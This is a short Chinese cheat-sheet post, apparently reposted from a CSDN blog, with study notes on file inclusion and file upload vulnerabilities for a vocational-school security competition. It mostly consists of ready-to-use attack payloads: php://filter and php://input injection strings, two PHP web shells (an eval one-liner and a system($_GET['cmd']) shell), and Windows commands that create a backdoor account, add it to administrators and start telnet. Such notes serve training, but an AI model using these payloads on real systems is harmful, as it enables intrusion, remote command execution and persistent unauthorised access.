其他分享
首页 > 其他分享> > 中职网安 文件包含漏洞与文件上传漏洞 笔记

中职网安 文件包含漏洞与文件上传漏洞 笔记

作者:互联网

二、文件包含漏洞与文件上传漏洞
1.利用条件:allow_url_include = On
2.文件包含漏洞,?file=php://filter/read=convert.base64-encode/resource=index.php  可查看index.php文件的代码
3.文件包含漏洞,?file=php://input  再提交post数据 <?php system("ipconfig")?>  可执行系统cmd命令并查看
cmd部分提权常用命令:
whoami  查看当前用户
ipconfig 显示本地IP地址
net start telnet 开telnet服务
net user            查看所有用户列表
net user hucxsz hucxsz /add 添加用户hucxsz密码为hucxsz
net localgroup administrators hucxsz /add 将帐号hucxsz升级为管理员
文件上传:
php一句话木马<?php eval($_POST[hucys]);?> 
cmd命令执行  <?php $rel = system($_GET['cmd']); echo $rel; ?>

标签:文件,hucxsz,中职,cmd,漏洞,net,php
来源: https://blog.csdn.net/qq_48609816/article/details/120933350